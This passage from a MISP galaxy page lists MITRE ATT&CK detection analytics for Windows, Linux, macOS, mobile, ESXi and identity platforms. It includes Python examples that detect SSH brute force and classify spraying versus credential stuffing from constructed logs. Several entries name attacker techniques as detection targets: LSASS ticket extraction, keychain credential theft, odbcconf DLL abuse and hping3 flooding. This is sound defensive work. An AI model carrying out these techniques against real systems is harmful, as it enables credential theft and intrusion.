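    """AN1276: a source that accumulates FAIL_THRESHOLD failures within WINDOW and then logs in."""
    failures = defaultdict(list)   # src -> timestamps of recent failures
    hits = []
    for ts, result, method, user, src in sorted(events):
        recent = [t for t in failures[src] if ts - t <= WINDOW]
        if result == "Failed":
            recent.append(ts)
            failures[src] = recent
        elif result == "Accepted":
            if len(recent) >= FAIL_THRESHOLD:
                hits.append({"src": src, "user": user, "failures": len(recent), "success_at": ts})
            failures[src] = []         # reset so one burst produces one alert
    return hits


if __name__ == "__main__":
    parsed = parse(SAMPLE_LOG)
    print(default_account_password_logins(parsed))
    print(brute_force_then_success(parsed))
```

The source 203.0.113.9 trips both checks (five failures, then an accepted password for root); alice's single typo followed by a successful login stays below the threshold, which is the false-positive case any threshold for this analytic has to absorb.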

Internal MISP references

UUID cba73580-034b-4cdd-84a2-22704d520e9c which can be used as unique global reference for Analytic 1276 - AN1276 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1276
mitre_platforms ['Linux']

Analytic 1762 - AN1762

Since data encryption is a common practice in many legitimate applications and uses standard programming language-specific APIs, encrypting data for command and control communication is regarded as undetectable to the user.

Internal MISP references

UUID 1f3c9114-ac86-4c1f-bb64-fb94d65ac78c which can be used as unique global reference for Analytic 1762 - AN1762 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1762
mitre_platforms ['Android']

Analytic 1672 - AN1672

Exfiltration Over C2 Channel can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.

Internal MISP references

UUID 413bdb56-913d-42e0-978e-5a48c60f562e which can be used as unique global reference for Analytic 1672 - AN1672 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1672
mitre_platforms ['iOS']

Analytic 1726 - AN1726

Application vetting services can detect certificate pinning by examining an application’s network_security_config.xml file, although this behavior can be benign.

Internal MISP references

UUID 93a35555-f71e-4230-9f2a-529a539e8612 which can be used as unique global reference for Analytic 1726 - AN1726 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1726
mitre_platforms ['iOS']

Analytic 1628 - AN1628

Detects timestamp changes using touch, SetFile, or direct metadata tampering (e.g., xattr manipulation) from Terminal, scripts, or low-level APIs.

Internal MISP references

UUID 097ce8cb-9a38-4c8a-836c-cee15ccdf258 which can be used as unique global reference for Analytic 1628 - AN1628 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1628
mitre_platforms ['macOS']

Analytic 1268 - AN1268

Credential stuffing attempts against Kubernetes API or containerized login shells using stolen or leaked user credentials

Internal MISP references

UUID 23c7fff8-de08-49dd-a101-0c35ad40bd7e which can be used as unique global reference for Analytic 1268 - AN1268 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1268
mitre_platforms ['Containers']

Analytic 1286 - AN1286

Abuse of system-generated or default privileged accounts such as 'root' or 'vpxuser' logging into ESXi hosts.

Internal MISP references

UUID 96fe3582-b1a3-40e4-9e9d-bab764f2af7e which can be used as unique global reference for Analytic 1286 - AN1286 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1286
mitre_platforms ['ESXi']

Analytic 1826 - AN1826

The user can view and manage installed third-party keyboards. Application vetting services can look for applications requesting the permissions granting access to accessibility services or application overlay.

Internal MISP references

UUID 7179bc7d-a2be-4ded-8c4f-88ec8f73e613 which can be used as unique global reference for Analytic 1826 - AN1826 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1826
mitre_platforms ['iOS']

Analytic 1682 - AN1682

Abuse of standard application protocols can be difficult to detect, as many legitimate mobile applications use the same protocols through standard platform APIs. Enterprises may be better served focusing on detection at other stages of adversarial behavior.

Internal MISP references

UUID a16c57b3-6a4c-4b15-92e9-d2d29f5b7d69 which can be used as unique global reference for Analytic 1682 - AN1682 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1682
mitre_platforms ['iOS']

Analytic 1269 - AN1269

Use of leaked credential pairs against Outlook Web Access (OWA), Microsoft 365, or Exchange from a single client IP with multiple failures

Internal MISP references

UUID 1b3bbeab-2000-47d6-88f9-8ed519f9bed6 which can be used as unique global reference for Analytic 1269 - AN1269 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1269
mitre_platforms ['Office Suite']

Analytic 1629 - AN1629

Detects abuse of busybox commands (e.g., touch) or log timestamp tampering during backdoor persistence or evasion.

Internal MISP references

UUID 1c3cb010-1c22-40c8-92d3-52e31353ad92 which can be used as unique global reference for Analytic 1629 - AN1629 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1629
mitre_platforms ['ESXi']

Analytic 1296 - AN1296

Unsigned or suspicious applications initiating network traffic claiming to be browser, mail, or cloud clients. Detects impersonation via TLS fingerprint and User-Agent string deviation.

Internal MISP references

UUID a4119120-396e-4993-8f9d-bc7b5fc94e7e which can be used as unique global reference for Analytic 1296 - AN1296 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1296
mitre_platforms ['macOS']

Analytic 1962 - AN1962

Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Monitor and analyze traffic patterns and packet inspection associated with protocol(s) that do not follow the expected protocol standards and traffic flows (e.g., extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous process execution and command-line arguments associated with traffic patterns (e.g., monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).

Internal MISP references

UUID c0195ab2-3c4e-41ce-a1e4-7e58118abeb4 which can be used as unique global reference for Analytic 1962 - AN1962 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1962
mitre_platforms ['PRE']

Analytic 1692 - AN1692

Application vetting services could look for applications that read android.os.SystemProperties or run getprop via Runtime.exec(). This could indicate some level of sandbox evasion, as Google recommends against using system properties within applications.

Internal MISP references

UUID c956f269-d282-4c68-afc6-ca68d8532ab6 which can be used as unique global reference for Analytic 1692 - AN1692 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1692
mitre_platforms ['iOS']

Analytic 1277 - AN1277

Password spraying or brute force attempts across user pool within short time intervals
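Distinguishing this analytic from AN1265 (credential stuffing from a single source, earlier on this page) comes down to the shape of the failures per source address, and the same aggregation answers both. The Python below is an added example for this page (not MITRE's content or any identity provider's detection rule): it groups constructed sign-in records by source IP and classifies each source by attempts per distinct username and by the share of failures whose username does not exist in the tenant, which is what a leaked list from an unrelated domain produces. The record shape, thresholds and the four sample sources are assumptions; the outcome strings stand in for whatever failure codes the provider's sign-in log uses.

```python
from collections import defaultdict

MIN_ATTEMPTS = 8          # assumption: below this a source is treated as ordinary user error
UNKNOWN_USER_RATIO = 0.3  # assumption: this share of "user_not_found" points at a foreign credential list


def classify_source(records):
    """records: [(timestamp, username, outcome)] for one source IP within one query window."""
    attempts = len(records)
    users = {u for _, u, _ in records}
    unknown = sum(1 for _, _, o in records if o == "user_not_found")
    successes = sum(1 for _, _, o in records if o == "success")
    stats = {"attempts": attempts, "distinct_users": len(users),
             "unknown_users": unknown, "successes": successes}
    if attempts < MIN_ATTEMPTS:
        return "benign", stats
    per_user = attempts / len(users)
    if len(users) <= 2 and per_user >= 5:
        label = "brute_force"            # many guesses against one or two accounts (AN1277)
    elif per_user <= 2 and unknown / attempts >= UNKNOWN_USER_RATIO:
        label = "credential_stuffing"    # leaked pairs, many for identities the tenant does not have (AN1265)
    elif per_user <= 2:
        label = "password_spraying"      # one or two guesses across many valid accounts (AN1277)
    else:
        label = "mixed"
    return label, stats


def classify_sources(signins):
    """signins: [(timestamp, source_ip, username, outcome)]; returns {source_ip: (label, stats)}."""
    per_src = defaultdict(list)
    for ts, src, user, outcome in signins:
        per_src[src].append((ts, user, outcome))
    return {src: classify_source(recs) for src, recs in per_src.items()}


# Constructed sign-in records (not from a real tenant); the shape is common to Entra ID, Okta and Duo exports.
SAMPLE_SIGNINS = (
    # one source, many distinct valid users, one attempt each: password spraying
    [("2024-05-06T01:%02d:00" % i, "198.51.100.40", "user%d@corp.example" % i, "invalid_password")
     for i in range(12)]
    # one source hammering a single account: brute force
    + [("2024-05-06T01:%02d:30" % i, "198.51.100.41", "cfo@corp.example", "invalid_password")
       for i in range(15)]
    # one source, many usernames unknown to the tenant, and one success: credential stuffing
    + [("2024-05-06T01:%02d:10" % i, "198.51.100.42", "person%d@other.example" % i, "user_not_found")
       for i in range(6)]
    + [("2024-05-06T01:06:10", "198.51.100.42", "bob@corp.example", "invalid_password"),
       ("2024-05-06T01:07:10", "198.51.100.42", "carol@corp.example", "success")]
    # a normal user mistyping once and then logging in
    + [("2024-05-06T08:00:00", "192.0.2.77", "dave@corp.example", "invalid_password"),
       ("2024-05-06T08:00:20", "192.0.2.77", "dave@corp.example", "success")]
)

if __name__ == "__main__":
    for src, (label, stats) in classify_sources(SAMPLE_SIGNINS).items():
        print(src, label, stats)
```

The stuffing source is the one with a success in it, and that success is the record to act on first: a spray that lands one password and a stuffing run that lands one reused password both end with a valid session, and the classification only tells you which credential hygiene failure let it happen.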

Internal MISP references

UUID 72bf9819-b0b5-43ab-9c2d-195abe8165b8 which can be used as unique global reference for Analytic 1277 - AN1277 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1277
mitre_platforms ['Identity Provider']

Analytic 1727 - AN1727

Application vetting services can detect which broadcast intents an application registers for and which permissions it requests.

Internal MISP references

UUID 0d22c60c-fd0b-47f8-abe4-2d661a73c653 which can be used as unique global reference for Analytic 1727 - AN1727 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1727
mitre_platforms ['Android']

Analytic 1772 - AN1772

In iOS 14 and up, an orange dot (or orange square if the Differentiate Without Color setting is enabled) appears in the status bar when the microphone is being used by an application. However, there have been demonstrations indicating it may still be possible to access the microphone in the background without triggering this visual indicator by abusing features that natively access the microphone or camera but do not trigger the visual indicators.(Citation: iOS Mic Spyware)

In Android 12 and up, a green dot appears in the status bar when the microphone is being used by an application.(Citation: Android Privacy Indicators) Android applications using the RECORD_AUDIO permission and iOS applications using RequestRecordPermission should be carefully reviewed and monitored. If the CAPTURE_AUDIO_OUTPUT permission is found in a third-party Android application, the application should be heavily scrutinized.

In both Android (6.0 and up) and iOS, the user can review which applications have the permission to access the microphone through the device settings screen and revoke permissions as necessary.

Internal MISP references

UUID d942e493-32eb-4302-890b-7729f63b7202 which can be used as unique global reference for Analytic 1772 - AN1772 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1772
mitre_platforms ['Android']

Analytic 1287 - AN1287

Login activity from default admin credentials (e.g., 'admin', 'cisco') on routers, firewalls, and switches.

Internal MISP references

UUID 305b6a70-6d5b-4b32-a40b-ae0cae342e62 which can be used as unique global reference for Analytic 1287 - AN1287 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1287
mitre_platforms ['Network Devices']

Analytic 1278 - AN1278

Multiple failed authentications in unified logs (e.g., loginwindow or sshd)

Internal MISP references

UUID b31fc018-6fbc-4de7-9bf2-f545b5f8f0c2 which can be used as unique global reference for Analytic 1278 - AN1278 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1278
mitre_platforms ['macOS']

Analytic 1728 - AN1728

Application vetting services can detect unnecessary and potentially abused location permissions. On Android 10 and later, the system shows a notification to the user when an app has been accessing device location in the background. Application vetting services can detect unnecessary and potentially abused API calls. The user can review which applications have location permissions in the operating system’s settings menu.

Internal MISP references

UUID 9b4be141-9743-4113-a5f6-2d1a019b0eeb which can be used as unique global reference for Analytic 1728 - AN1728 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1728
mitre_platforms ['Android']

Analytic 1827 - AN1827

Many properly configured firewalls may also naturally block command and control traffic over non-standard ports. Application vetting reports may show network communications performed by the application, including hosts, ports, protocols, and URLs. Further detection would most likely be at the enterprise level, through packet and/or netflow inspection.

Internal MISP references

UUID b6ef77d6-cc8b-478c-b7f8-7767bbb58960 which can be used as unique global reference for Analytic 1827 - AN1827 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1827
mitre_platforms ['Android']

Analytic 1782 - AN1782

Application vetting services could look for android.permission.READ_CONTACTS in an Android application’s manifest, or NSContactsUsageDescription in an iOS application’s Info.plist file. Most applications do not need contact list access, so extra scrutiny could be applied to those that request it. On both Android and iOS, the user can manage which applications have permission to access the contact list through the device settings screen, revoking the permission if necessary.

Internal MISP references

UUID e0ee0af8-96f8-4baf-b0f2-63d4b49938f2 which can be used as unique global reference for Analytic 1782 - AN1782 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1782
mitre_platforms ['Android']

Analytic 1297 - AN1297

ESXi hosts initiating connections from non-standard daemons mimicking HTTP/HTTPS or SNMP traffic, but with irregular payload formats or expired/unsigned TLS certificates.

Internal MISP references

UUID 8307d1d4-4f50-481b-9126-3b145fd68a73 which can be used as unique global reference for Analytic 1297 - AN1297 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1297
mitre_platforms ['ESXi']

Analytic 1972 - AN1972

Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Detection efforts may be focused on related behaviors, such as Web Protocols or Asymmetric Cryptography.

Internal MISP references

UUID a05f564d-365c-46ce-ab98-ba377aa3b660 which can be used as unique global reference for Analytic 1972 - AN1972 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1972
mitre_platforms ['PRE']

Analytic 1279 - AN1279

Excessive login attempts followed by success from SaaS apps like O365, Dropbox, etc.

Internal MISP references

UUID a1436a64-ffc4-4e39-a7c8-140e78336ffa which can be used as unique global reference for Analytic 1279 - AN1279 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1279
mitre_platforms ['SaaS']

Analytic 1792 - AN1792

Mobile security products may provide URL inspection services that could determine if a domain being visited is malicious. Enterprises may be able to detect anomalous traffic originating from mobile devices, which could indicate compromise.

Internal MISP references

UUID 07b782b2-7e86-424a-9395-0a862d9b25c3 which can be used as unique global reference for Analytic 1792 - AN1792 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1792
mitre_platforms ['iOS']

Analytic 1729 - AN1729

Application vetting services can detect unnecessary and potentially abused location permissions. On Android 10 and later, the system shows a notification to the user when an app has been accessing device location in the background. Application vetting services can detect unnecessary and potentially abused API calls. The user can review which applications have location permissions in the operating system’s settings menu.

Internal MISP references

UUID 2f2ed160-9093-4b1f-b781-8660552bf1e5 which can be used as unique global reference for Analytic 1729 - AN1729 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1729
mitre_platforms ['iOS']

Analytic 1288 - AN1288

Execution of Microsoft-signed scripts (e.g., pubprn.vbs, installutil.exe, wscript.exe, cscript.exe) used to proxy execution of untrusted or external binaries. Behavior is detected through command-line process lineage, child process spawning, and unsigned payload execution from a signed parent.

Internal MISP references

UUID 84e969fd-a0ee-425f-a7dd-ae10e170d45a which can be used as unique global reference for Analytic 1288 - AN1288 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1288
mitre_platforms ['Windows']

Analytic 1828 - AN1828

Many properly configured firewalls may also naturally block command and control traffic over non-standard ports. Application vetting reports may show network communications performed by the application, including hosts, ports, protocols, and URLs. Further detection would most likely be at the enterprise level, through packet and/or netflow inspection.

Internal MISP references

UUID 7c96d701-391d-4904-b6ba-941344aaf059 which can be used as unique global reference for Analytic 1828 - AN1828 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1828
mitre_platforms ['iOS']

Analytic 1289 - AN1289

Detects thread local storage (TLS) callback injection by monitoring memory modifications to PE headers and TLS directory structures during or after process hollowing events, followed by anomalous thread behavior prior to main entry point execution.

Internal MISP references

UUID 44500eb7-01f2-4cab-8b76-1227bb48e13e which can be used as unique global reference for Analytic 1289 - AN1289 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1289
mitre_platforms ['Windows']

Analytic 1982 - AN1982

Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates) Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control. Monitor for contextual data about a malicious payload, such as compilation times, file hashes, as well as watermarks or other identifiable configuration information. Monitor for logged network traffic in response to a scan showing both protocol header and body values that may buy and/or steal capabilities that can be used during targeting. Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific Malware-as-a-Service (MaaS) offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services.
Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain) Malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in Cobalt Strike payloads.(Citation: Analyzing CS Dec 2020)

Internal MISP references

UUID 5697a257-0888-4fd5-84fd-756f6fa67690 which can be used as unique global reference for Analytic 1982 - AN1982 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1982
mitre_platforms ['PRE']

Analytic 1298 - AN1298

Detects adversary tampering with shared directories via file drops (e.g., malicious LNK, EXE, VBS) followed by user execution or suspicious network activity.

Internal MISP references

UUID a0554596-7100-4f8b-a4dd-165f528fe6a1 which can be used as unique global reference for Analytic 1298 - AN1298 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1298
mitre_platforms ['Windows']

Analytic 1829 - AN1829

Scheduling tasks/jobs can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.

Internal MISP references

UUID 07c399a0-e5ad-462d-99b9-f51ce8aa5061 which can be used as unique global reference for Analytic 1829 - AN1829 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1829
mitre_platforms ['Android']

Analytic 1992 - AN1992

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID 3ee2fdaa-358a-4f65-9d15-c9096628bc7e which can be used as unique global reference for Analytic 1992 - AN1992 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1992
mitre_platforms ['PRE']

Analytic 1299 - AN1299

Detects script or binary modification within shared NFS/SMB directories followed by process execution from those paths.

Internal MISP references

UUID 7518f788-43dd-440a-955c-870cdb7dea26 which can be used as unique global reference for Analytic 1299 - AN1299 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1299
mitre_platforms ['Linux']

Analytic 1333 - AN1333

Use unified logs to identify processes issuing repeated DNS queries where the resolved IP addresses change frequently within very short TTL values. Correlate with outbound network traffic to validate C2-like patterns.

Internal MISP references

UUID 22d28e80-ecae-4fa4-8901-ef9125c99e9f which can be used as unique global reference for Analytic 1333 - AN1333 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1333
mitre_platforms ['macOS']

Analytic 1433 - AN1433

Detection focuses on unauthorized manipulation of .NET AppDomainManager behavior. Defenders may observe suspicious creation of new AppDomains within trusted processes, anomalous loading of assemblies via non-standard configuration files, or registry/environment variable changes redirecting AppDomainManager to malicious assemblies. Correlated events include config file tampering, new process creation of .NET host processes (e.g., w3wp.exe, powershell.exe) with modified runtime parameters, and module loads of unusual or unsigned .NET DLLs.

Internal MISP references

UUID aa3484d0-d7ae-40e2-8a44-6b963883a35d which can be used as unique global reference for Analytic 1433 - AN1433 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1433
mitre_platforms ['Windows']

Analytic 1343 - AN1343

SaaS applications receiving authentication failures for dozens of accounts using the same password or login signature

Internal MISP references

UUID c4a0d95a-2dfc-4b03-830e-d0dafca0be6f which can be used as unique global reference for Analytic 1343 - AN1343 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1343
mitre_platforms ['SaaS']

Analytic 1334 - AN1334

Monitor ESXi syslog and esxcli outputs for abnormal DNS resolver behavior, such as frequent domain-to-IP changes or unauthorized modifications of DNS settings used by management agents. Correlate domain lookups with short TTL values.

Internal MISP references

UUID f9534b4a-57ef-40a0-801a-d56a217304f0 which can be used as unique global reference for Analytic 1334 - AN1334 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1334
mitre_platforms ['ESXi']

Analytic 1533 - AN1533

Observation of blueutil/networksetup commands or low-level APIs toggling Bluetooth or initiating transfers, especially if paired with recent large file read activity by non-GUI processes.

Internal MISP references

UUID 2f6dd4a5-b0cc-4c13-abb8-e2d747d591b2 which can be used as unique global reference for Analytic 1533 - AN1533 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1533
mitre_platforms ['macOS']

Analytic 1335 - AN1335

Identifies abuse of odbcconf.exe to execute malicious DLLs using the REGSVR command flag. Behavior chain: (1) Process creation of odbcconf.exe with /REGSVR or /A {REGSVR ...} arguments → (2) DLL load by odbcconf.exe of non-standard or unsigned modules → (3) Optional follow-on process creation or network activity from loaded DLL.

Internal MISP references

UUID 6c0a2e08-debd-46e6-bb5f-5159ad8f12ad which can be used as unique global reference for Analytic 1335 - AN1335 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1335
mitre_platforms ['Windows']

Analytic 1353 - AN1353

Suspicious enumeration of attached peripherals via WMI, PowerShell, or low-level API calls potentially chained with removable device interactions.

Internal MISP references

UUID a986c8fd-6779-4769-895a-e6d167d9f1a9 which can be used as unique global reference for Analytic 1353 - AN1353 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1353
mitre_platforms ['Windows']

Analytic 1336 - AN1336

A high volume of authentication failures using a single password (or small set) across many different user accounts within a defined time window

Internal MISP references

UUID 5ef73ed0-313e-4b9b-b616-8c2d02f4151a which can be used as unique global reference for Analytic 1336 - AN1336 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1336
mitre_platforms ['Windows']

Analytic 1363 - AN1363

Monitor unified logs for access to payment applications, browser plug-ins, or Apple Pay services from non-standard processes. Detect anomalous use of Automator scripts or keychain extraction targeting financial account credentials.

Internal MISP references

UUID ce3ebda8-d47e-4730-a1f4-3366d33a98ab which can be used as unique global reference for Analytic 1363 - AN1363 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1363
mitre_platforms ['macOS']

Analytic 1633 - AN1633

Detects exploitation attempts targeting defensive security software or OS services. Defender observation includes abnormal process behavior (e.g., AV or EDR crashing unexpectedly), unsigned/untrusted modules loaded into defensive processes, or privilege escalation from security agent services. Multi-event correlation ties exploitation attempts to subsequent evasive behavior like service termination or missing logs.

Internal MISP references

UUID e5b0fcab-05e5-4687-a1a9-dd382a19980b which can be used as unique global reference for Analytic 1633 - AN1633 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1633
mitre_platforms ['Windows']

Analytic 1337 - AN1337

Authentication failures across different accounts using a repeated or similar password via SSH or PAM stack within a short window

Internal MISP references

UUID 2b751817-3de2-4388-b8b9-d43b5ecda671 which can be used as unique global reference for Analytic 1337 - AN1337 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1337
mitre_platforms ['Linux']

Analytic 1373 - AN1373

Detection of adversaries tampering with container runtime security plugins, disabling admission controllers, or stopping monitoring sidecars.

Internal MISP references

UUID f421cbe1-d42e-45e9-adad-12c6ed0a5cb8 which can be used as unique global reference for Analytic 1373 - AN1373 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1373
mitre_platforms ['Containers']

Analytic 1733 - AN1733

Mobile security products can detect which applications can request device administrator permissions. Application vetting services could look for use of APIs that could indicate the application is trying to hide activity. The user can view applications with administrator access through the device settings, and may also notice if user data is inexplicably missing. The user can see a list of applications that can use accessibility services in the device settings.

Internal MISP references

UUID 50e52979-5f21-4a02-99f3-fc1858b73369 which can be used as unique global reference for Analytic 1733 - AN1733 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1733
mitre_platforms ['iOS']

Analytic 1338 - AN1338

Multiple failed login attempts across different users using common password patterns (e.g., 'Welcome2023')

Internal MISP references

UUID 36c2c2fb-0bea-40fe-9032-c0758d381de5 which can be used as unique global reference for Analytic 1338 - AN1338 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1338
mitre_platforms ['macOS']

Analytic 1383 - AN1383

Detects non-standard compilation activity via Xcode CLI tools or bundled GCC/MONO packages writing new executable files and executing them outside dev environments (e.g., user Downloads folder).

Internal MISP references

UUID 56a814a9-2b6b-4fcc-a530-e9ca62faaa17 which can be used as unique global reference for Analytic 1383 - AN1383 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1383
mitre_platforms ['macOS']

Analytic 1833 - AN1833

Application vetting services could look for usage of the READ_PRIVILEGED_PHONE_STATE Android permission. This could indicate that non-system apps are attempting to access information that they do not have access to.

Internal MISP references

UUID a3b1f9ea-184b-4429-94c0-d04c3b457b91 which can be used as unique global reference for Analytic 1833 - AN1833 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1833
mitre_platforms ['Android']

Analytic 1339 - AN1339

Sign-in failures across enterprise SSO applications or SaaS platforms from the same IP address using the same password against multiple user identities

Internal MISP references

UUID 0527196a-1551-445c-bdd7-943dfda9b718 which can be used as unique global reference for Analytic 1339 - AN1339 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1339
mitre_platforms ['Identity Provider']

Analytic 1393 - AN1393

Detects anomalous use of Dynamic Data Exchange (DDE) for code execution, such as Office applications (WINWORD.EXE, EXCEL.EXE) spawning command interpreters, or loading unusual modules through DDEAUTO/DDE formulas. Correlates suspicious parent-child process relationships, registry keys enabling DDE, and module loads inconsistent with normal Office usage.

Internal MISP references

UUID d9383849-c91c-4eef-88a0-97c2454ca1af which can be used as unique global reference for Analytic 1393 - AN1393 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1393
mitre_platforms ['Windows']

Analytic 1434 - AN1434

Executable or script generating large outbound network traffic targeting remote hosts or known amplification ports

Internal MISP references

UUID 0eff49de-834e-42d3-9a7a-3ac032aa9836 which can be used as unique global reference for Analytic 1434 - AN1434 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1434
mitre_platforms ['Windows']

Analytic 1344 - AN1344

Behavioral chain: (1) a login from a third-party account or untrusted source network establishes an interactive/remote session; (2) the session acquires elevated privileges or accesses sensitive resources atypical for that account; (3) subsequent lateral movement or data access occurs from the same session/device. Correlate Windows logon events, token elevation/privileged use, and resource access with third-party context.

Internal MISP references

UUID 46630fc8-75de-4b73-b46e-0a4eeb7ad310 which can be used as unique global reference for Analytic 1344 - AN1344 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1344
mitre_platforms ['Windows']

Analytic 1443 - AN1443

Detects anomalous Kerberos activity such as forged or stolen tickets by correlating malformed fields in logon events, RC4-encrypted TGTs, or TGS requests without corresponding TGT requests. Also detects suspicious processes accessing LSASS memory for ticket extraction.

Internal MISP references

UUID 685b05a6-92a3-417d-a917-8e7689e43237 which can be used as unique global reference for Analytic 1443 - AN1443 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1443
mitre_platforms ['Windows']

Analytic 1435 - AN1435

Flooding tools like hping3 or nping sending large volumes of packets across multiple ports or IPs

Internal MISP references

UUID 1578f892-0644-4974-bf55-9abb802612fa which can be used as unique global reference for Analytic 1435 - AN1435 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1435
mitre_platforms ['Linux']

Analytic 1534 - AN1534

Detection focuses on identifying unauthorized file creation or modification within /etc/emond.d/rules/ or /private/var/db/emondClients, which indicate attempts to register a malicious emond rule. Correlate with process execution of /sbin/emond and any launched commands it invokes, especially during boot or login events. Anomalies may include rules created by non-root users or unexpected shell commands executed by emond.

Internal MISP references

UUID 5e4aea30-f04b-4f1e-b68a-f2f3a95e5066 which can be used as unique global reference for Analytic 1534 - AN1534 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1534
mitre_platforms ['macOS']

Analytic 1354 - AN1354

Enumeration of USB and other peripheral hardware via udevadm, lshw, or /sys or /proc interfaces in proximity to collection or mounting behavior.

Internal MISP references

UUID c8d9ad93-e4ce-4b00-89cb-8f0f6452923d which can be used as unique global reference for Analytic 1354 - AN1354 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1354
mitre_platforms ['Linux']

Analytic 1345 - AN1345

